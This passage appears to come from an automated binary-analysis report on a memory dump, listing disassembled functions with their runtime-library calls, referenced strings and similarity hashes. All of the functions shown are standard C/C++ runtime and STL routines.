Function 004B19B5, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 65COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004B19BA
__CxxThrowException@8.LIBVCRUNTIME ref: 004B1A54

Part of subcall function 006850AE: RaiseException.KERNEL32(?,?,00579A90,?,?,00782B5C,?,?,?,?,?,00579A90,?,00776940,?), ref: 0068510D

std::exception::exception.LIBCONCRT ref: 004B1A26

Part of subcall function 0040F331: ___std_exception_copy.LIBVCRUNTIME ref: 0040F358

std::exception::exception.LIBCONCRT ref: 004B1A63

Strings

]sB, xrefs: 004B1A3D
unexpected end of data, xrefs: 004B1A1E, 004B1A5E

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: std::exception::exception$ExceptionException@8H_prologRaiseThrow___std_exception_copy
String ID: ]sB$unexpected end of data
API String ID: 4183761955-1396046059
Opcode ID: c6d15faaa86d848d583d73a550a0b10915402563c7f48320aa408ff538b2cdc4
Instruction ID: da3deb847f2bd80c10def2c0f67ea457f459e055d0673e9863bf34604f824adb
Opcode Fuzzy Hash: c6d15faaa86d848d583d73a550a0b10915402563c7f48320aa408ff538b2cdc4
Instruction Fuzzy Hash: 8A2126B0C01245DFCB10CFA4C5253EEBBB5FF09304FA4815AD4426B2A1D77D1A06CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 006A9F83, Relevance: 10.6, APIs: 7, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 006A9CCA: _free.LIBCMT ref: 006A9CF3

_free.LIBCMT ref: 006A9FD1

Part of subcall function 0069742F: HeapFree.KERNEL32(00000000,00000000), ref: 00697445
Part of subcall function 0069742F: GetLastError.KERNEL32(?,?,006A9CF8,?,00000000,?,00000000,?,006A9F9C,?,00000007,?,?,006AA385,?,?), ref: 00697457

_free.LIBCMT ref: 006A9FDC
_free.LIBCMT ref: 006A9FE7
_free.LIBCMT ref: 006AA03B
_free.LIBCMT ref: 006AA046
_free.LIBCMT ref: 006AA051
_free.LIBCMT ref: 006AA05C

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: fe52f794938568f2a39025e6bf4513a5881a7f1c1122233f9aa4b5afc9f35657
Instruction ID: d48440d4c3b522647280de204e301d23d6867995d301bc73b8bc1437724e9c42
Opcode Fuzzy Hash: fe52f794938568f2a39025e6bf4513a5881a7f1c1122233f9aa4b5afc9f35657
Instruction Fuzzy Hash: 71118432540B04B6DA60B7B0CC4BFCB7FDEAF06B10F40481DB79AA6253D665B9158A64

Uniqueness

Uniqueness Score: -1.00%

Function 00686DCC, Relevance: 10.6, APIs: 7, Instructions: 60COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00686DC3,0068621D,0057A3EE,0000000C,0057A6D1,?,?,?,?,00413D98,?,?), ref: 00686DDA
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00686DE8
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00686E01
SetLastError.KERNEL32(00000000,?,00686DC3,0068621D,0057A3EE,0000000C,0057A6D1,?,?,?,?,00413D98,?,?), ref: 00686E53

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 49196f5ed8c68660eb60289db98353ed1651f020db792ff8488a7a91f7e6e984
Instruction ID: 67422ed5cd767d745e04199a70cfd03c93b2b10cc3f009a43a1dabd45992a5cc
Opcode Fuzzy Hash: 49196f5ed8c68660eb60289db98353ed1651f020db792ff8488a7a91f7e6e984
Instruction Fuzzy Hash: 8C01F13628D7115EE7603775EE8A95A278AFB007B9730432EF520842E0EE914C125398

Uniqueness

Uniqueness Score: -1.00%

Function 00422B03, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 52COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00422B08
__CxxThrowException@8.LIBVCRUNTIME ref: 00422B2E

Strings

ios_base::eofbit set, xrefs: 00422B8F
ios_base::badbit set, xrefs: 00422B3D
z,B, xrefs: 00422B51
ios_base::failbit set, xrefs: 00422B71

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Exception@8H_prologThrow
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set$z,B
API String ID: 3222999186-1719427159
Opcode ID: f1897247435d3e105d3733559e05750925c2ae089210548edb9544d07b35a23d
Instruction ID: b7364e5dacc069af7ceca0022a19109a51f3ce4e5cecb01bc097d3acd7cbf9c0
Opcode Fuzzy Hash: f1897247435d3e105d3733559e05750925c2ae089210548edb9544d07b35a23d
Instruction Fuzzy Hash: 9711C6B1A00218BEEB00EF94D917BEE7B74EB10704F50414EF9016A1D2D7FD5A55CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0057E08A, Relevance: 10.6, APIs: 7, Instructions: 51COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0057E091
std::_Lockit::_Lockit.LIBCPMT ref: 0057E09B

Part of subcall function 004214CA: __EH_prolog.LIBCMT ref: 004214CF
Part of subcall function 004214CA: std::_Lockit::_Lockit.LIBCPMT ref: 004214E3
Part of subcall function 004214CA: std::_Lockit::~_Lockit.LIBCPMT ref: 00421503

std::locale::_Getfacet.LIBCPMT ref: 0057E0BB
ctype.LIBCPMT ref: 0057E0D5
__CxxThrowException@8.LIBVCRUNTIME ref: 0057E0F2
std::_Facet_Register.LIBCPMT ref: 0057E111
std::_Lockit::~_Lockit.LIBCPMT ref: 0057E11A

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrowctypestd::locale::_
String ID:
API String ID: 189735510-0
Opcode ID: c7b6f5193fa2d4ed01cd0bf1a1261442a634b0a8614a23c3e44081791369c4e1
Instruction ID: f57723cdd7172e852cf687167f79176c06b65abf4b602d9e0d194f0e3e938d87
Opcode Fuzzy Hash: c7b6f5193fa2d4ed01cd0bf1a1261442a634b0a8614a23c3e44081791369c4e1
Instruction Fuzzy Hash: D401E531D0021A9BCF01FB60D80AABD777ABF84360F54855EF5086B291DF389D029794

Uniqueness

Uniqueness Score: -1.00%

Function 0057E127, Relevance: 10.6, APIs: 7, Instructions: 51COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0057E12E
std::_Lockit::_Lockit.LIBCPMT ref: 0057E138

Part of subcall function 004214CA: __EH_prolog.LIBCMT ref: 004214CF
Part of subcall function 004214CA: std::_Lockit::_Lockit.LIBCPMT ref: 004214E3
Part of subcall function 004214CA: std::_Lockit::~_Lockit.LIBCPMT ref: 00421503

std::locale::_Getfacet.LIBCPMT ref: 0057E158
messages.LIBCPMT ref: 0057E172
__CxxThrowException@8.LIBVCRUNTIME ref: 0057E18F
std::_Facet_Register.LIBCPMT ref: 0057E1AE
std::_Lockit::~_Lockit.LIBCPMT ref: 0057E1B7

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrowmessagesstd::locale::_
String ID:
API String ID: 2194591311-0
Opcode ID: 312c0d2a8d8798ad9bd7e83f95442ab3f12864de7e292e43117483c86f5eb80b
Instruction ID: 047497067f58eec9273fa767a97950f460d0aed1d77930752b00b516c8413c21
Opcode Fuzzy Hash: 312c0d2a8d8798ad9bd7e83f95442ab3f12864de7e292e43117483c86f5eb80b
Instruction Fuzzy Hash: DF01E131E0011A9BCF01FF60E84AAAD7B3ABF84720F94811EE5146B292DF389D02D795

Uniqueness

Uniqueness Score: -1.00%

Function 0057E1C4, Relevance: 10.6, APIs: 7, Instructions: 51COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0057E1CB
std::_Lockit::_Lockit.LIBCPMT ref: 0057E1D5

Part of subcall function 004214CA: __EH_prolog.LIBCMT ref: 004214CF
Part of subcall function 004214CA: std::_Lockit::_Lockit.LIBCPMT ref: 004214E3
Part of subcall function 004214CA: std::_Lockit::~_Lockit.LIBCPMT ref: 00421503

std::locale::_Getfacet.LIBCPMT ref: 0057E1F5
messages.LIBCPMT ref: 0057E20F
__CxxThrowException@8.LIBVCRUNTIME ref: 0057E22C
std::_Facet_Register.LIBCPMT ref: 0057E24B
std::_Lockit::~_Lockit.LIBCPMT ref: 0057E254

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrowmessagesstd::locale::_
String ID:
API String ID: 2194591311-0
Opcode ID: fea54f3795e7a3d35891303e0debc57fcad26d89e6126a540baf91451de44e26
Instruction ID: 8d2846f454c9663139101262886eb8a7b6c6ccaca8f0ae43900d3bd3bd8cc8c9
Opcode Fuzzy Hash: fea54f3795e7a3d35891303e0debc57fcad26d89e6126a540baf91451de44e26
Instruction Fuzzy Hash: EF010835E0021A9BCF01FB60D816ABD7B7ABF84310F54815EE5157B292DF389D029794

Uniqueness

Uniqueness Score: -1.00%

Function 0057E4D5, Relevance: 10.6, APIs: 7, Instructions: 51COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0057E4DC
std::_Lockit::_Lockit.LIBCPMT ref: 0057E4E6

Part of subcall function 004214CA: __EH_prolog.LIBCMT ref: 004214CF
Part of subcall function 004214CA: std::_Lockit::_Lockit.LIBCPMT ref: 004214E3
Part of subcall function 004214CA: std::_Lockit::~_Lockit.LIBCPMT ref: 00421503

std::locale::_Getfacet.LIBCPMT ref: 0057E506
moneypunct.LIBCPMT ref: 0057E520
__CxxThrowException@8.LIBVCRUNTIME ref: 0057E53D
std::_Facet_Register.LIBCPMT ref: 0057E55C
std::_Lockit::~_Lockit.LIBCPMT ref: 0057E565

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrowmoneypunctstd::locale::_
String ID:
API String ID: 3858443405-0
Opcode ID: 66f2416af1f9cde6df8562304594085011557e81dbf9dbd05d8d94769f0749fa
Instruction ID: 88309617e5c093fbed976cfc0cdef2d761d7d6c2dbf7e41b549c7a3bdb78ad38
Opcode Fuzzy Hash: 66f2416af1f9cde6df8562304594085011557e81dbf9dbd05d8d94769f0749fa
Instruction Fuzzy Hash: 3901E535D0011E9BCF01FB60E806ABD7736BF84764F54811EE5056B291DF389E029794

Uniqueness

Uniqueness Score: -1.00%

Function 0057E572, Relevance: 10.6, APIs: 7, Instructions: 51COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0057E579
std::_Lockit::_Lockit.LIBCPMT ref: 0057E583

Part of subcall function 004214CA: __EH_prolog.LIBCMT ref: 004214CF
Part of subcall function 004214CA: std::_Lockit::_Lockit.LIBCPMT ref: 004214E3
Part of subcall function 004214CA: std::_Lockit::~_Lockit.LIBCPMT ref: 00421503

std::locale::_Getfacet.LIBCPMT ref: 0057E5A3
moneypunct.LIBCPMT ref: 0057E5BD
__CxxThrowException@8.LIBVCRUNTIME ref: 0057E5DA
std::_Facet_Register.LIBCPMT ref: 0057E5F9
std::_Lockit::~_Lockit.LIBCPMT ref: 0057E602

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrowmoneypunctstd::locale::_
String ID:
API String ID: 3858443405-0
Opcode ID: 05ebdb81d5ddbb486bb36310bdd54d2794def8860a674f04d7555ef5808bbbc7
Instruction ID: c28f0c74d9639050ca7155126b0ad27aeee20a1f50ff4bfa7ec981bf77a62a37
Opcode Fuzzy Hash: 05ebdb81d5ddbb486bb36310bdd54d2794def8860a674f04d7555ef5808bbbc7
Instruction Fuzzy Hash: E301C871D0012A9BCF01FB60D856ABD777ABF84364F54811EE5096B291EF389D029794

Uniqueness

Uniqueness Score: -1.00%

Function 0057E60F, Relevance: 10.6, APIs: 7, Instructions: 51COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0057E616
std::_Lockit::_Lockit.LIBCPMT ref: 0057E620

Part of subcall function 004214CA: __EH_prolog.LIBCMT ref: 004214CF
Part of subcall function 004214CA: std::_Lockit::_Lockit.LIBCPMT ref: 004214E3
Part of subcall function 004214CA: std::_Lockit::~_Lockit.LIBCPMT ref: 00421503

std::locale::_Getfacet.LIBCPMT ref: 0057E640
moneypunct.LIBCPMT ref: 0057E65A
__CxxThrowException@8.LIBVCRUNTIME ref: 0057E677
std::_Facet_Register.LIBCPMT ref: 0057E696
std::_Lockit::~_Lockit.LIBCPMT ref: 0057E69F

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrowmoneypunctstd::locale::_
String ID:
API String ID: 3858443405-0
Opcode ID: 442dc27d6c158f2e61e93540659ffaf028788d12c740bc3a95d25a5aa1624e60
Instruction ID: cb91173c225a63c3d1685be69aa7d05cdd50c0691a2646420f36cdd4883eaf5f
Opcode Fuzzy Hash: 442dc27d6c158f2e61e93540659ffaf028788d12c740bc3a95d25a5aa1624e60
Instruction Fuzzy Hash: C601D671E0021A9BCF01FB60E84AAFD7B76BF94720F54815EF5186B291DF389D029B94

Uniqueness

Uniqueness Score: -1.00%

Function 0057E6AC, Relevance: 10.6, APIs: 7, Instructions: 51COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0057E6B3
std::_Lockit::_Lockit.LIBCPMT ref: 0057E6BD

Part of subcall function 004214CA: __EH_prolog.LIBCMT ref: 004214CF
Part of subcall function 004214CA: std::_Lockit::_Lockit.LIBCPMT ref: 004214E3
Part of subcall function 004214CA: std::_Lockit::~_Lockit.LIBCPMT ref: 00421503

std::locale::_Getfacet.LIBCPMT ref: 0057E6DD
moneypunct.LIBCPMT ref: 0057E6F7
__CxxThrowException@8.LIBVCRUNTIME ref: 0057E714
std::_Facet_Register.LIBCPMT ref: 0057E733
std::_Lockit::~_Lockit.LIBCPMT ref: 0057E73C

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrowmoneypunctstd::locale::_
String ID:
API String ID: 3858443405-0
Opcode ID: 11cdeabd4fbf839735178fe64e5096b76199ebebee8ca5c152b56982dd72b8c8
Instruction ID: a17168550a96c2339a8356dc3d9be866e043e479a6961a78349c04047bd62c52
Opcode Fuzzy Hash: 11cdeabd4fbf839735178fe64e5096b76199ebebee8ca5c152b56982dd72b8c8
Instruction Fuzzy Hash: 8001E131E0021A9BCF05FB60E84AABD7B3ABF94720F54811EF5046B291DF389D029794

Uniqueness

Uniqueness Score: -1.00%

Function 0057E9BD, Relevance: 10.6, APIs: 7, Instructions: 51COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0057E9C4
std::_Lockit::_Lockit.LIBCPMT ref: 0057E9CE

Part of subcall function 004214CA: __EH_prolog.LIBCMT ref: 004214CF
Part of subcall function 004214CA: std::_Lockit::_Lockit.LIBCPMT ref: 004214E3
Part of subcall function 004214CA: std::_Lockit::~_Lockit.LIBCPMT ref: 00421503

std::locale::_Getfacet.LIBCPMT ref: 0057E9EE
numpunct.LIBCPMT ref: 0057EA08
__CxxThrowException@8.LIBVCRUNTIME ref: 0057EA25
std::_Facet_Register.LIBCPMT ref: 0057EA44
std::_Lockit::~_Lockit.LIBCPMT ref: 0057EA4D

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrownumpunctstd::locale::_
String ID:
API String ID: 639073845-0
Opcode ID: 2fd9b6b00b3dc21d06cbc15e32d99eb753244ee44c26df5322171a647bdb08bc
Instruction ID: 31ed021203bc483472f10fc28317c2f047fe65571de112c8228c6646113e889e
Opcode Fuzzy Hash: 2fd9b6b00b3dc21d06cbc15e32d99eb753244ee44c26df5322171a647bdb08bc
Instruction Fuzzy Hash: 3A01A532D0011A9BCF05FBA0D80AAED7B7ABF94350F58411EE5056B291DF389D019794

Uniqueness

Uniqueness Score: -1.00%

Function 0057EA5A, Relevance: 10.6, APIs: 7, Instructions: 51COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0057EA61
std::_Lockit::_Lockit.LIBCPMT ref: 0057EA6B

Part of subcall function 004214CA: __EH_prolog.LIBCMT ref: 004214CF
Part of subcall function 004214CA: std::_Lockit::_Lockit.LIBCPMT ref: 004214E3
Part of subcall function 004214CA: std::_Lockit::~_Lockit.LIBCPMT ref: 00421503

std::locale::_Getfacet.LIBCPMT ref: 0057EA8B
numpunct.LIBCPMT ref: 0057EAA5
__CxxThrowException@8.LIBVCRUNTIME ref: 0057EAC2
std::_Facet_Register.LIBCPMT ref: 0057EAE1
std::_Lockit::~_Lockit.LIBCPMT ref: 0057EAEA

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrownumpunctstd::locale::_
String ID:
API String ID: 639073845-0
Opcode ID: 980f7fdcbc3e0e02a94aeacfb593aa0e326c60afd0605a3c4131e8689dc79e44
Instruction ID: 9870d01b33c97e0511278d34731fd3073b369277aacee534625e06cfa7c0167f
Opcode Fuzzy Hash: 980f7fdcbc3e0e02a94aeacfb593aa0e326c60afd0605a3c4131e8689dc79e44
Instruction Fuzzy Hash: C9018E32E0021A9BCF05FB60D80AAAE7B76BF94760F54851EF504AB291DF389D029794

Uniqueness

Uniqueness Score: -1.00%

Function 0058B0EA, Relevance: 10.6, APIs: 7, Instructions: 51COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0058B0F1
std::_Lockit::_Lockit.LIBCPMT ref: 0058B0FB

Part of subcall function 004214CA: __EH_prolog.LIBCMT ref: 004214CF
Part of subcall function 004214CA: std::_Lockit::_Lockit.LIBCPMT ref: 004214E3
Part of subcall function 004214CA: std::_Lockit::~_Lockit.LIBCPMT ref: 00421503

std::locale::_Getfacet.LIBCPMT ref: 0058B11B
messages.LIBCPMT ref: 0058B135
__CxxThrowException@8.LIBVCRUNTIME ref: 0058B152
std::_Facet_Register.LIBCPMT ref: 0058B171
std::_Lockit::~_Lockit.LIBCPMT ref: 0058B17A

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrowmessagesstd::locale::_
String ID:
API String ID: 2194591311-0
Opcode ID: bb20f5c6f90d293135ba7c02777dae2036b3dc7b52b2d812526f19f2314b5ce2
Instruction ID: f855589eea8cb30b6036de76e21f6830e7013f9eb81f76f71ab1aebc7c198e45
Opcode Fuzzy Hash: bb20f5c6f90d293135ba7c02777dae2036b3dc7b52b2d812526f19f2314b5ce2
Instruction Fuzzy Hash: 95017C36E0011A9BDF01FBA0981AAFD7B6ABF94750F54411AE9147B291DF389E02C794

Uniqueness

Uniqueness Score: -1.00%

Function 0058B2C1, Relevance: 10.6, APIs: 7, Instructions: 51COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0058B2C8
std::_Lockit::_Lockit.LIBCPMT ref: 0058B2D2

Part of subcall function 004214CA: __EH_prolog.LIBCMT ref: 004214CF
Part of subcall function 004214CA: std::_Lockit::_Lockit.LIBCPMT ref: 004214E3
Part of subcall function 004214CA: std::_Lockit::~_Lockit.LIBCPMT ref: 00421503

std::locale::_Getfacet.LIBCPMT ref: 0058B2F2
moneypunct.LIBCPMT ref: 0058B30C
__CxxThrowException@8.LIBVCRUNTIME ref: 0058B329
std::_Facet_Register.LIBCPMT ref: 0058B348
std::_Lockit::~_Lockit.LIBCPMT ref: 0058B351

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrowmoneypunctstd::locale::_
String ID:
API String ID: 3858443405-0
Opcode ID: 22f89c970ce9e1b0e82a735cf634a1b0f7823dc10a9d27b2cdb8c32ae7425c0b
Instruction ID: 20d596d0470a181b410cc875016517742053646c3adf8cb7f58fd7df68b73302
Opcode Fuzzy Hash: 22f89c970ce9e1b0e82a735cf634a1b0f7823dc10a9d27b2cdb8c32ae7425c0b
Instruction Fuzzy Hash: F301CE32E0012A9BDF05FB60D806AAD7B7ABF90320F54450EE9147B291DF389D028794

Uniqueness

Uniqueness Score: -1.00%

Function 0058B35E, Relevance: 10.6, APIs: 7, Instructions: 51COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0058B365
std::_Lockit::_Lockit.LIBCPMT ref: 0058B36F

Part of subcall function 004214CA: __EH_prolog.LIBCMT ref: 004214CF
Part of subcall function 004214CA: std::_Lockit::_Lockit.LIBCPMT ref: 004214E3
Part of subcall function 004214CA: std::_Lockit::~_Lockit.LIBCPMT ref: 00421503

std::locale::_Getfacet.LIBCPMT ref: 0058B38F
moneypunct.LIBCPMT ref: 0058B3A9
__CxxThrowException@8.LIBVCRUNTIME ref: 0058B3C6
std::_Facet_Register.LIBCPMT ref: 0058B3E5
std::_Lockit::~_Lockit.LIBCPMT ref: 0058B3EE

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrowmoneypunctstd::locale::_
String ID:
API String ID: 3858443405-0
Opcode ID: c42fc5633dd83b204bc91232f413c4ccd6707c14352701f7b7649a1efeee0d64
Instruction ID: 0f4083e580389b9e603a1426d680b47046457926f59966b16f7ff63611f1bcc1
Opcode Fuzzy Hash: c42fc5633dd83b204bc91232f413c4ccd6707c14352701f7b7649a1efeee0d64
Instruction Fuzzy Hash: ED01C431E0011A9BDF01FBA0DC5AABD7B7ABF84360F64451EE9147B291DF389E028794

Uniqueness

Uniqueness Score: -1.00%

Function 0057DEB3, Relevance: 10.6, APIs: 7, Instructions: 51COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0057DEBA
std::_Lockit::_Lockit.LIBCPMT ref: 0057DEC4

Part of subcall function 004214CA: __EH_prolog.LIBCMT ref: 004214CF
Part of subcall function 004214CA: std::_Lockit::_Lockit.LIBCPMT ref: 004214E3
Part of subcall function 004214CA: std::_Lockit::~_Lockit.LIBCPMT ref: 00421503

std::locale::_Getfacet.LIBCPMT ref: 0057DEE4
codecvt.LIBCPMT ref: 0057DEFE
__CxxThrowException@8.LIBVCRUNTIME ref: 0057DF1B
std::_Facet_Register.LIBCPMT ref: 0057DF3A
std::_Lockit::~_Lockit.LIBCPMT ref: 0057DF43

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrowcodecvtstd::locale::_
String ID:
API String ID: 3564103573-0
Opcode ID: 1611fe7b48f438a92da8ecc818c3a94219a920292351faa4271edef345abc9eb
Instruction ID: ca76310498d5e313ec469cadeb88748d3b7a8d91e26a3cf8c538d9668a4da230
Opcode Fuzzy Hash: 1611fe7b48f438a92da8ecc818c3a94219a920292351faa4271edef345abc9eb
Instruction Fuzzy Hash: F501A131E0011A9BCF01FB60E855ABDBB7ABF84320F54811EE5197B2A1DF389D02D7A5

Uniqueness

Uniqueness Score: -1.00%

Function 0057DF50, Relevance: 10.6, APIs: 7, Instructions: 51COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0057DF57
std::_Lockit::_Lockit.LIBCPMT ref: 0057DF61

Part of subcall function 004214CA: __EH_prolog.LIBCMT ref: 004214CF
Part of subcall function 004214CA: std::_Lockit::_Lockit.LIBCPMT ref: 004214E3
Part of subcall function 004214CA: std::_Lockit::~_Lockit.LIBCPMT ref: 00421503

std::locale::_Getfacet.LIBCPMT ref: 0057DF81
collate.LIBCPMT ref: 0057DF9B
__CxxThrowException@8.LIBVCRUNTIME ref: 0057DFB8
std::_Facet_Register.LIBCPMT ref: 0057DFD7
std::_Lockit::~_Lockit.LIBCPMT ref: 0057DFE0

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrowcollatestd::locale::_
String ID:
API String ID: 2345145342-0
Opcode ID: 20720ab2c3896a848340e2f02b1e0851c7c59d48ed57463827d9fdafe5606cde
Instruction ID: 5c07b0ff50b652b0c386fa0e9cd2d99abe800497b223a02fb1d6714862ff6714
Opcode Fuzzy Hash: 20720ab2c3896a848340e2f02b1e0851c7c59d48ed57463827d9fdafe5606cde
Instruction Fuzzy Hash: 6C01A531E0011A9BCF05FB60EC55AAD7776BF94350F54811EE5056B291DF389D01D7A4

Uniqueness

Uniqueness Score: -1.00%

Function 0057DFED, Relevance: 10.6, APIs: 7, Instructions: 51COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0057DFF4
std::_Lockit::_Lockit.LIBCPMT ref: 0057DFFE

Part of subcall function 004214CA: __EH_prolog.LIBCMT ref: 004214CF
Part of subcall function 004214CA: std::_Lockit::_Lockit.LIBCPMT ref: 004214E3
Part of subcall function 004214CA: std::_Lockit::~_Lockit.LIBCPMT ref: 00421503

std::locale::_Getfacet.LIBCPMT ref: 0057E01E
collate.LIBCPMT ref: 0057E038
__CxxThrowException@8.LIBVCRUNTIME ref: 0057E055
std::_Facet_Register.LIBCPMT ref: 0057E074
std::_Lockit::~_Lockit.LIBCPMT ref: 0057E07D

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrowcollatestd::locale::_
String ID:
API String ID: 2345145342-0
Opcode ID: b26a7f2dd7fe170cdb7d01a2b6d3c36a5ec653d8acb256a61a1043e4da75c4f6
Instruction ID: f6b3ce2b6d03dbf471ed78e9f1be678877e951832a1a47e2217678b4d978ca21
Opcode Fuzzy Hash: b26a7f2dd7fe170cdb7d01a2b6d3c36a5ec653d8acb256a61a1043e4da75c4f6
Instruction Fuzzy Hash: 16010831D0021A9BCF01FB60D80AAFD7B76BF94310F54811EE5086B291DF389D029794

Uniqueness

Uniqueness Score: -1.00%

Function 004C78C5, Relevance: 10.5, APIs: 1, Strings: 5, Instructions: 42COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004C78CA

Part of subcall function 004A6580: __EH_prolog.LIBCMT ref: 004A6585

Part of subcall function 004A6306: __EH_prolog.LIBCMT ref: 004A630B

Strings

@5s, xrefs: 004C78D6, 004C791E, 004C7931, 004C7945, 004C7960
lL, xrefs: 004C793B
R8J, xrefs: 004C7909
|m, xrefs: 004C7919, 004C791F
t4s, xrefs: 004C78F4

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog
String ID: @5s$R8J$lL$t4s$|m
API String ID: 3519838083-1674767415
Opcode ID: c0dc73e4d4a233cec0616b76e7345daac501e3db89df453a229d016595fe2871
Instruction ID: 23442ae073b739701650157c5e6858fca3355d897afdfec64d7bb90044f8f868
Opcode Fuzzy Hash: c0dc73e4d4a233cec0616b76e7345daac501e3db89df453a229d016595fe2871
Instruction Fuzzy Hash: 88115AB1B00A249FDB11DF68E98DA6ABBB1FB44314F10826ED51497351D3B84A058BC4

Uniqueness

Uniqueness Score: -1.00%

Function 0041078B, Relevance: 10.5, APIs: 1, Strings: 5, Instructions: 41COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00410790

Strings

asio.misc error, xrefs: 004107DA
Element not found, xrefs: 004107C7
End of file, xrefs: 004107BB
Already open, xrefs: 004107AA
The descriptor does not fit into the select call's fd_set, xrefs: 004107D3

Memory Dump Source

